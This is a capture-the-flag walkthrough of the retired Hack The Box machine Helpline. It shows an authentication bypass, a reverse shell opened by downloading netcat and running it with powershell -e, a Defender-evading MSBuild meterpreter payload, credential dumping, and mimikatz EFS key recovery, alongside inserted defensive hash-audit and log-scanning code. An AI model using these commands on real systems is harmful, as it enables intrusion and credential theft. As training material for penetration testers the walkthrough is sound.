Helpline Writeup - Hack The Box (Retired)


Helpline is one of the more advanced and difficult machines on Hack The Box. There is more than one solution to many of the parts of this machine; however, it ultimately leads to some necessary cryptography at the end. What's more interesting is that this box highlights the limitations of the NT AUTHORITY\SYSTEM user. The box was created by egre55, a security researcher, sysadmin, and penetration tester.

Initial Foothold

Scanning the host:

nmap -sV -sC -oA nmap/Helpline

135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp  open  http-proxy    -
|     HTTP/1.1 200 OK
|_http-title: ManageEngine ServiceDesk Plus
49667/tcp open  msrpc         Microsoft Windows RPC

Visiting the HTTP server on port 8080, we find ManageEngine ServiceDesk Plus version 9.3.

Researching the application yields a privilege escalation vulnerability (CVE-2019-10008) and a proof of concept written in Python on Exploit-DB.

The default credentials for the guest user are accepted by the script:

root@kali:~/htb/Helpline# python
User with low priv: guest:guest
User to bypass authentication to: administrator
Getting a session id
Logging in with low privilege user
Captured authenticated cookies.
Captured secondary sessid.
Doing the magic step 1.
Doing the magic step 2.
Captured target session.Set following cookies on your browser.

Logging in as guest with the default guest credentials, we can adjust our stored cookies in the developer console so we can impersonate the administrator user.

Acquiring a Shell

Command Scheduler

Under the Admin tab there is a section called Custom Schedules that lets the help-desk application schedule and execute commands locally:

By scheduling the command below, we download a portable Windows netcat binary from our machine.

powershell.exe "IWR -Uri -OutFile nc.exe"

If we schedule a second command using the netcat binary, we can create a reverse shell back to us from the web server:

powershell.exe -exec bypass -c ".\nc.exe 1337 -e powershell.exe"

Both commands are successful, and we are running as the system user on the E drive.

We can search and enumerate user directories with the Get-ChildItem cmdlet:

gci -recurse C:\Users\ | where { ! $_.PSIsContainer } | select fullname | findstr /i /v "url lnk"

Oddly, even as the SYSTEM user and after running both takeown and icacls on user.txt, we still cannot read the file. Let's find out whether the files are encrypted in any way:

C:\Users\Leo\Documents>Cipher /U /N

Encrypted File(s) on your system:

The files are EFS-encrypted, which is why SYSTEM cannot read them: EFS is keyed to the owning user's certificate, not to file permissions. To access these files, we can try signing in as the users who own them. If we enumerate further, there is a "C:\Temp\Password Audit\it_logins.txt" file with clear-text creds (this actually isn't very useful for us):

PS C:\Temp\Password Audit> cat 'C:\Temp\Password Audit\it_logins.txt'

local Windows account created

username: alice
password: $sys4ops@megabank!
admin required: no

shadow admin accounts:


User Shell(s)

Creating a Meterpreter Session

Using GreatSCT, we can bypass Windows Defender and create a reverse shell for meterpreter using MSBuild.

root@kali:/opt/GreatSCT# ./ 
                             GreatSCT | [Version]: 1.0
      [Web]: | [Twitter]: @ConsciousHacker

Main Menu

 1 tools loaded

Available Commands:

 exit   Exit GreatSCT
 info   Information on a specific tool
 list   List available tools
 update   Update GreatSCT
 use   Use a specific tool

Main menu choice: use 1
GreatSCT-Bypass Menu

 26 payloads loaded

Available Commands:

 back   Go to main GreatSCT menu
 checkvt   Check virustotal against generated hashes
 clean   Remove generated artifacts
 exit   Exit GreatSCT
 info   Information on a specific payload
 list   List available payloads
 use   Use a specific payload

GreatSCT-Bypass command: use 9
Payload: msbuild/meterpreter/rev_tcp selected

Required Options:

Name             Value    Description
----             -----    -----------
DOMAIN           X        Optional: Required internal domain
EXPIRE_PAYLOAD   X        Optional: Payloads expire after "Y" days
HOSTNAME         X        Optional: Required system hostname
INJECT_METHOD    Virtual  Virtual or Heap
LHOST                     IP of the Metasploit handler
LPORT            4444     Port of the Metasploit handler
PROCESSORS       X        Optional: Minimum number of processors
SLEEP            X        Optional: Sleep "Y" seconds, check if accelerated
TIMEZONE         X        Optional: Check to validate not in UTC
USERNAME         X        Optional: The required user account

 Available Commands:

 back         Go back
 exit         Completely exit GreatSCT
 generate     Generate the payload
 options      Show the shellcode's options
 set          Set shellcode option

[msbuild/meterpreter/rev_tcp>>] set lhost

[msbuild/meterpreter/rev_tcp>>] generate

Please enter the base name for output files (default is payload): payload

 [*] Language: msbuild
 [*] Payload Module: msbuild/meterpreter/rev_tcp
 [*] MSBuild compiles for  us, so you just get xml :)
 [*] Source code written to: /usr/share/greatsct-output/source/payload.xml
 [*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/payload.rc

Please press enter to continue >: exit

Have the remote host download payload.xml from your Kali instance and run the Metasploit rc file to set up the handler. Kali:

msfconsole -r payload.rc 

Windows Remote Host

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe .\payload.xml

From your meterpreter session, dump hashes:

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY f684313986dcdab719c2950661809893...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


With the dumped hashes, we can attempt to crack them or look them up in public hash databases.

d5312b245d641b3fae0d07493a022622 Unknown Not found.
31d6cfe0d16ae931b73c59d7e0c089c0 NTLM 
31d6cfe0d16ae931b73c59d7e0c089c0 NTLM 
52a344a6229f7bfa074d3052023f0b41 Unknown Not found.
998a9de69e883618e987080249d20253 Unknown Not found.
eef285f4c800bcd1ae1e84c371eeb282 NTLM 0987654321
60b05a66232e2eb067b973c889b615dd Unknown Not found.
35a9de42e66dcdd5d512a796d03aef50 Unknown Not found.
03e2ec7aa7e82e479be07ecd34f1603b Unknown 

Zachary's password is "0987654321" and he is in the Event Log Readers group.
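
The lookup above compares each dumped value against precomputed NT hashes, and the two entries that resolve to NTLM with no password are the well-known hash of an empty password. The following Python is an added example, not part of the original writeup, showing what such a lookup actually computes: an NT hash is MD4 over the UTF-16LE encoding of the password, with no salt, so identical passwords always produce identical hashes. It audits a constructed dump for empty passwords and for passwords already found in clear text on the host. The hash values and candidate passwords are the ones quoted on this page; the account labels (other than zachary) are assumptions. The MD4 implementation is pure Python because hashlib's MD4 depends on OpenSSL's legacy provider and is often unavailable.

```python
import struct

# Pure-Python MD4 (RFC 1320); hashlib.new("md4") needs OpenSSL's legacy
# provider and frequently fails on current systems.
_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def _md4_block(state, block):
    X = struct.unpack("<16I", block)
    a, b, c, d = state
    rounds = (
        # (boolean function, additive constant, per-step shifts, message-word order)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
         (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for func, const, shifts, order in rounds:
        for step, i in enumerate(order):
            a = _rotl((a + func(b, c, d) + X[i] + const) & _MASK, shifts[step % 4])
            a, b, c, d = d, a, b, c  # rotate registers so each step updates a new one
    return [(s + v) & _MASK for s, v in zip(state, (a, b, c, d))]


def md4(data: bytes) -> bytes:
    # Merkle-Damgard padding: 0x80, zeros to 56 mod 64, then 64-bit LE bit length
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        state = _md4_block(state, bytes(msg[off:off + 64]))
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password, unsalted (hex, lowercase)."""
    return md4(password.encode("utf-16le")).hex()


EMPTY_PASSWORD_NT = nt_hash("")  # 31d6cfe0d16ae931b73c59d7e0c089c0


def audit_hashes(dump, candidates):
    """dump: {account: nt_hash_hex}. candidates: plaintext passwords already
    known (e.g. found in clear text on the host). Returns {account: finding}."""
    table = {nt_hash(p): p for p in candidates}
    findings = {}
    for account, h in dump.items():
        h = h.lower()
        if h == EMPTY_PASSWORD_NT:
            findings[account] = "empty password"
        elif h in table:
            findings[account] = f"password known in clear text: {table[h]!r}"
    return findings


# Constructed dump: hash values are the ones listed on this page; the account
# labels are assumptions (the writeup only attributes eef285... to zachary).
SAMPLE_DUMP = {
    "zachary": "eef285f4c800bcd1ae1e84c371eeb282",
    "account_a": "31d6cfe0d16ae931b73c59d7e0c089c0",
    "account_b": "31d6cfe0d16ae931b73c59d7e0c089c0",
    "account_c": "d5312b245d641b3fae0d07493a022622",
}
# Passwords already seen in clear text on the host, per the writeup.
KNOWN_PLAINTEXT = ["0987654321", "$sys4ops@megabank!"]

if __name__ == "__main__":
    for account, finding in audit_hashes(SAMPLE_DUMP, KNOWN_PLAINTEXT).items():
        print(f"{account}: {finding}")
```

Any account the audit flags is one to remediate: an empty NT hash means the account has no password at all, and a hash that matches a password lying around in a text file means that file is as good as the credential itself.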

With the administrator hash, we can do a Pass-the-hash attack over psexec, but only if we disable Real-Time Monitoring in Windows defender as NT AUTHORITY\SYSTEM (we no longer need MSBuild to create meterpreter sessions).

Set-MpPreference -DisableRealtimeMonitoring $true

To read the contents of Leo's user directory, we can either migrate our current SYSTEM process into a process run by Leo or impersonate Leo's token using incognito.

meterpreter > ps
 4724  5036  ctfmon.exe               x64   1        HELPLINE\leo                  C:\Windows\System32\ctfmon.exe
 4804  3736  postgres.exe             x86   0        NT AUTHORITY\SYSTEM           E:\ManageEngine\ServiceDesk\pgsql\bin\postgres.exe
 4852  596   svchost.exe              x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 4908  904   MSBuild.exe              x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
 5036  596   svchost.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 5180  620   vmtoolsd.exe             x64   1        HELPLINE\leo                  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
meterpreter > migrate 5180
[*] Migrating from 5320 to 5180...
[*] Migration completed successfully.
meterpreter > shell

Process 3280 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved
C:\Windows\system32>type %userprofile%\Desktop\*



The output is the administrator's password stored as an exported PSCredential. We will decrypt it later and focus on getting the contents of user.txt. We can dump and search the event logs for tolu's password using zachary's credentials in PowerShell.

PS C:\Windows\system32>wevtutil el > C:\EventLogs.txt
PS C:\Windows\system32>foreach($line in Get-Content C:\EventLogs.txt) {wevtutil qe /r: /u:HELPLINE\zachary /p:0987654321 $line >> C:\ReadableLogs.txt}

Download ReadableLogs.txt to your Kali instance from meterpreter and convert it to a parse-friendly file.

meterpreter > cd C:/
meterpreter > download ReadableLogs.txt
[*] Downloading: ReadableLogs.txt -> ReadableLogs.txt
[*] Downloaded 1.00 MiB of 75.37 MiB (1.33%): ReadableLogs.txt -> ReadableLogs.txt
[*] download   : ReadableLogs.txt -> ReadableLogs.txt
root@kali:/htb/Helpline# dos2unix ReadableLogs.txt
dos2unix: converting file ReadableLogs.txt to Unix format...
root@kali:~/htb/Helpline# grep tolu ReadableLogs.txt | grep "4688" | grep -o "Command.*" | nl
     1 CommandLine'>"C:\Windows\system32\net.exe" use T: \\helpline\helpdesk_stats /USER:tolu !zaq1234567890pl!99</Data><Data Name='TargetUserSid'>S-1-0-0</Data><Data Name='TargetUserName'>-</Data><Data Name='TargetDomainName'>-</Data><Data Name='TargetLogonId'>0x0</Data><Data Name='ParentProcessName'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data Name='MandatoryLabel'>S-1-16-12288</Data></EventData></Event>
     2 CommandLine'>"C:\Windows\system32\systeminfo.exe" /S \\helpline /U /USER:tolu /P !zaq1234567890pl!99</Data><Data Name='TargetUserSid'>S-1-0-0</Data><Data Name='TargetUserName'>-</Data><Data Name='TargetDomainName'>-</Data><Data Name='TargetLogonId'>0x0</Data><Data Name='ParentProcessName'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data Name='MandatoryLabel'>S-1-16-12288</Data></EventData></Event>

User tolu has the password "!zaq1234567890pl!99".
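
The grep above works because process-creation auditing (event 4688) records the full command line, so any password passed as a command-line argument lands in the Security log, where anyone in Event Log Readers (zachary here) can read it. The following Python is an added example, not code from the original post, of the check a defender would run over the same data: it walks wevtutil's XML output, picks out 4688 events, flags command lines that carry a credential switch and records a redacted copy. The sample events are constructed to mirror the two hits above with placeholder passwords and are wrapped in an <Events> root element so the concatenated records parse as one document; the switch patterns are assumptions covering net use, the /P style used by systeminfo and generic -p/password= forms.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape `wevtutil qe Security` emits (one <Event>
# per record), wrapped in a root element so it parses as one document.
# Command lines mirror the writeup's findings; the passwords are placeholders.
SAMPLE_EVENTS = r"""<Events>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>
  <System><EventID>4688</EventID><Computer>helpline</Computer></System>
  <EventData>
    <Data Name='SubjectUserName'>tolu</Data>
    <Data Name='NewProcessName'>C:\Windows\System32\net.exe</Data>
    <Data Name='CommandLine'>"C:\Windows\system32\net.exe" use T: \\helpline\helpdesk_stats /USER:tolu PLACEHOLDER_PW_1</Data>
    <Data Name='ParentProcessName'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
  </EventData>
</Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>
  <System><EventID>4688</EventID><Computer>helpline</Computer></System>
  <EventData>
    <Data Name='SubjectUserName'>tolu</Data>
    <Data Name='NewProcessName'>C:\Windows\System32\systeminfo.exe</Data>
    <Data Name='CommandLine'>"C:\Windows\system32\systeminfo.exe" /S \\helpline /U helpline\tolu /P PLACEHOLDER_PW_2</Data>
  </EventData>
</Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>
  <System><EventID>4688</EventID><Computer>helpline</Computer></System>
  <EventData>
    <Data Name='SubjectUserName'>leo</Data>
    <Data Name='NewProcessName'>C:\Windows\System32\whoami.exe</Data>
    <Data Name='CommandLine'>"C:\Windows\system32\whoami.exe" /all</Data>
  </EventData>
</Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>
  <System><EventID>4624</EventID><Computer>helpline</Computer></System>
  <EventData><Data Name='TargetUserName'>tolu</Data></EventData>
</Event>
</Events>"""

# Heuristic switch patterns (assumed, not exhaustive); group 1 is the secret.
CREDENTIAL_PATTERNS = [
    # net use ... /USER:name password  (the bare word after the user)
    ("net use /USER:", re.compile(r"(?i)/USER:\S+\s+(\S+)")),
    # systeminfo-style /P password or /P:password
    ("/P switch", re.compile(r"(?i)(?:^|\s)/P[:\s]\s*(\S+)")),
    # generic -p, --password=, /password:, password=
    ("-p / password=", re.compile(r"(?i)(?:^|\s)(?:-p|--password|/password|password)[=:\s]\s*(\S+)")),
]


def _local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def iter_process_creations(xml_text):
    """Yield the EventData fields of every 4688 (process creation) event."""
    root = ET.fromstring(xml_text)
    for event in root.iter():
        if _local(event.tag) != "Event":
            continue
        event_id, fields = None, {}
        for el in event.iter():
            name = _local(el.tag)
            if name == "EventID":
                event_id = el.text
            elif name == "Data" and el.get("Name"):
                fields[el.get("Name")] = el.text or ""
        if event_id == "4688":
            yield fields


def find_exposed_credentials(xml_text):
    """Return one finding per 4688 event whose command line carries a secret,
    with the secret replaced by <REDACTED> so the finding itself is safe to log."""
    findings = []
    for fields in iter_process_creations(xml_text):
        cmd = fields.get("CommandLine", "")
        for label, pattern in CREDENTIAL_PATTERNS:
            m = pattern.search(cmd)
            if m:
                findings.append({
                    "user": fields.get("SubjectUserName", "?"),
                    "process": fields.get("NewProcessName", "?"),
                    "indicator": label,
                    "command_line": cmd.replace(m.group(1), "<REDACTED>"),
                })
                break  # one finding per event is enough
    return findings


if __name__ == "__main__":
    for f in find_exposed_credentials(SAMPLE_EVENTS):
        print(f"{f['user']} ran {f['process']} [{f['indicator']}]: {f['command_line']}")
```

Feeding it a real export means wrapping the records the same way. On the host side the fix is to stop passing secrets as arguments (prompting for them or using a credential store instead) and to treat Event Log Readers membership as a sensitive grant, since it exposes everything 4688 captures.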
With PowerShell Remoting, we can authenticate locally as tolu and read user.txt:

PS C:\Windows\system32>$user = 'HELPLINE\tolu'
PS C:\Windows\system32>$pass= ConvertTo-SecureString '!zaq1234567890pl!99' -AsPlainText -Force

PS C:\Windows\system32>$cred = New-Object System.Management.Automation.PSCredential($user, $pass) 
PS C:\Windows\system32>Invoke-Command -ComputerName HELPLINE -Credential $cred -Authentication credssp -ScriptBlock {type c:\Users\tolu\Desktop\user.txt}


Privilege Escalation to Administrator

Reading root.txt

Using the encrypted PSCredential from earlier, we can recover the plaintext credentials with PowerShell, sign in as administrator, and create a stable reverse shell using the netcat binary from earlier.

PS C:\Users\leo\Desktop\>$user = 'HELPLINE\Administrator'
PS C:\Users\leo\Desktop\>$file = '.\admin-pass.xml'
PS C:\Users\leo\Desktop\>$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,(Get-Content $file | ConvertTo-SecureString)
PS C:\Users\leo\Desktop\>$cred.GetNetworkCredential().password
PS C:\Users\leo\Desktop\>$securePassword = ConvertTo-SecureString -AsPlainText -Force 'mb@letmein@SERVER#acc'
PS C:\Users\leo\Desktop\>$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
PS C:\Users\leo\Desktop\>Enter-PSSession -ComputerName localhost -Credential $credential
[localhost]: PS C:\Users\Administrator\Documents> C:\Temp\nc.exe -e powershell.exe 1337
PS C:\Users\Administrator\Documents> cat ~\Desktop\root.txt
cat : Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.

The file is still encrypted, and this remote session cannot decrypt it. Return to the NT AUTHORITY\SYSTEM shell and, with the administrator's credentials, recover the EFS key material with mimikatz (mimikatz should be written to a writable path).

PS C:\Users\Administrator\Desktop>Cipher /C C:\Users\Administrator\Desktop\root.txt
 Listing C:\Users\Administrator\Desktop\
 New files added to this directory will not be encrypted.

E root.txt
  Compatibility Level:
    Windows XP/Server 2003

  Users who can decrypt:
    HELPLINE\Administrator [Administrator(Administrator@HELPLINE)]
    Certificate thumbprint: FB15 4575 993A 250F E826 DBAC 79EF 26C2 11CB 77B3 

  No recovery certificate found.

  Key information cannot be retrieved.

The specified file could not be decrypted.

  .#####.   mimikatz 2.2.0 (x86) #18362 Aug 14 2019 01:31:19
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( )
 ## \ / ##       >
 '## v ##'       Vincent LE TOUX             ( )
  '#####'        > /   ***/

mimikatz # crypto::system /file:C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3 /export

* File: 'C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3'
  Provider info:
 Key Container  : 3dd3e213-bce6-4acb-808c-a1b3227ecbde
 Provider       : Microsoft Enhanced Cryptographic Provider v1.0
 Provider type  : RSA_FULL (1)
 Type           : AT_KEYEXCHANGE (0x00000001)
 Flags          : 00000000
 Param (todo)   : 00000000 / 00000000

[0003/1] SHA1_HASH_PROP_ID
[0020/1] cert_file_element
  Data: [certificate bytes omitted]
  Saved to file: FB154575993A250FE826DBAC79EF26C211CB77B3.der

... //Follow the path to the private key location (directory is hidden)
C:\Temp\mimikatz\Win32>dir /a C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85
... //Command to get Private key's masterkey
mimikatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85"
... //Command to decrypt Master Key
mimikatz # dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500\9e78687d-d881-4ccb-8bd8-bc0a19608687" /password:mb@letmein@SERVER#acc
Auto SID from path seems to be: S-1-5-21-3107372852-1132949149-763516304-500

[masterkey] with password: mb@letmein@SERVER#acc (normal user)
  key : 8ed6519c4d09a506504c4f611203bea8979a385f8a444fe57b5d2256ee1e4eb34392a141f502cd9aeea8d2187c2525c3ae998dc3cebad81cc4e41dbb6bc65fa8
  sha1: b18974052cb509a86a008869fd95388550678184
... //Command to decrypt private key
mimikatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85" 
... //Private key is decrypted -> raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk
... //Must download private keys locally to forge a certificate that will let us read root.txt
root@kali:~/htb/Helpline# openssl x509 -inform DER -outform PEM -in FB154575993A250FE826DBAC79EF26C211CB77B3.der -out public.pem
root@kali:~/htb/Helpline# openssl rsa -inform PVK -outform PEM -in raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk -out private.pem
writing RSA key
root@kali:~/htb/Helpline# openssl pkcs12 -in public.pem -inkey private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
... //Upload and import cert

C:\Users\Administrator\Desktop>certutil -user -p mimikatz -importpfx cert.pfx NoChain,NoRoot
Certificate "Administrator" added to store.

CertUtil: -importPFX command completed successfully.

C:\Users\Administrator\Desktop>type root.txt
type root.txt

Congratulations, you pwned a not-so-easy machine!
It personally took me a week to finish a box of this magnitude and difficulty. There were a few misleading plain-text credentials in the Web API and a few other places stored locally on the box, so it was very easy to fall into a rabbit hole for a few hours or longer.

Rayce Toms

Student Researcher



Summary: OneTwoSeven is a creatively designed realistic box by Hack The Box user @jkr . The foothold for this Linux box craftily utilizes symbolic links and port forwarding through sftp to gain access to the admin interface. This ultimately leads to RCE and a shell after some addon-based web exploitation. For escalating to the root user, we take advantage of the available apt sudo commands while performing a man-in-the-middle package injection via http-proxy. I have seen a similar, if not the same attack (slide 26), executed as part of Red Team's arsenal at the National Collegiate Cyber Defense Competition . Finding a Foothold Initial Enumeration: root@kali : ~/htb/ # nmap -sV -sC -oA nmap/OneTwoSeven Starting Nmap 7.80 ( ) at 2019-08-08 22:04 AKDT Nmap scan report for Host is up (0.12s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh